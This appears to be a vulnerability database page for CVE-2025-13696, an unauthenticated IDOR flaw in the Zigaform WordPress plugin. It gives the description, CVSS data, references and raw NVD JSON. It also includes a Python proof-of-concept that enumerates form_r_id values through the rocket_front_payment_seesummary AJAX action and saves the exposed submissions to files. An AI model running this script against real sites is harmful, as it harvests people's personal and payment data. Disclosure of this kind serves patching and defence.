Security Vulnerability Report
CVE-2025-13696 CVSS 5.3 MEDIUM

CVE-2025-13696

Published: 2025-12-02 08:16:00
Last Modified: 2026-04-15 00:35:42

Description

The Zigaform plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 7.6.5. This is due to the plugin exposing a public AJAX endpoint that retrieves form submission data without performing authorization checks to verify ownership or access rights. This makes it possible for unauthenticated attackers to extract sensitive form submission data including personal information, payment details, and other private data via the rocket_front_payment_seesummary action by enumerating sequential form_r_id values.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

Zigaform - Cost Estimator Lite <= 7.6.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-13696 PoC - Zigaform IDOR Information Disclosure
# Target: WordPress site with Zigaform plugin <= 7.6.5
TARGET_URL = "https://example.com/wp-admin/admin-ajax.php"


def exploit_zigaform_idor():
    print("[*] CVE-2025-13696 - Zigaform IDOR Information Disclosure")
    print("[*] Target: " + TARGET_URL)

    # Iterate through form_r_id values to extract submissions
    for form_id in range(1, 100):
        params = {
            "action": "rocket_front_payment_seesummary",
            "form_r_id": str(form_id),
        }
        try:
            response = requests.get(TARGET_URL, params=params, timeout=10)
            if response.status_code == 200 and response.text.strip():
                print(f"\n[!] Found submission with form_r_id={form_id}")
                print(f"[+] Response length: {len(response.text)} bytes")
                print(f"[+] Raw response:\n{response.text[:500]}")
                # Save to file for analysis
                with open(f"submission_{form_id}.json", "w") as f:
                    f.write(response.text)
                print(f"[+] Saved to submission_{form_id}.json")
        except requests.RequestException as e:
            print(f"[-] Request failed for form_r_id={form_id}: {e}")
            continue


if __name__ == "__main__":
    exploit_zigaform_idor()

References

https://github.com/Softdiscover/Zigaform-WP-Cost-Estimator-Lite/commit/f129d8dd1fb3ab0535c7eb18d52fc49141ab36c8
https://plugins.trac.wordpress.org/browser/zigaform-calculator-cost-estimation-form-builder-lite/tags/7.6.5/modules/formbuilder/controllers/uiform-fb-controller-frontend.php#L106
https://plugins.trac.wordpress.org/browser/zigaform-calculator-cost-estimation-form-builder-lite/trunk/modules/formbuilder/controllers/uiform-fb-controller-frontend.php#L106
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3406507%40zigaform-calculator-cost-estimation-form-builder-lite&new=3406507%40zigaform-calculator-cost-estimation-form-builder-lite&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/47f9a466-2826-4835-b06e-14cf4ceb7567?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-13696",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-02T08:16:00.490",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Zigaform plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 7.6.5. This is due to the plugin exposing a public AJAX endpoint that retrieves form submission data without performing authorization checks to verify ownership or access rights. This makes it possible for unauthenticated attackers to extract sensitive form submission data including personal information, payment details, and other private data via the rocket_front_payment_seesummary action by enumerating sequential form_r_id values."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-200"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/Softdiscover/Zigaform-WP-Cost-Estimator-Lite/commit/f129d8dd1fb3ab0535c7eb18d52fc49141ab36c8",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/zigaform-calculator-cost-estimation-form-builder-lite/tags/7.6.5/modules/formbuilder/controllers/uiform-fb-controller-frontend.php#L106",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/zigaform-calculator-cost-estimation-form-builder-lite/trunk/modules/formbuilder/controllers/uiform-fb-controller-frontend.php#L106",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3406507%40zigaform-calculator-cost-estimation-form-builder-lite&new=3406507%40zigaform-calculator-cost-estimation-form-builder-lite&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/47f9a466-2826-4835-b06e-14cf4ceb7567?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}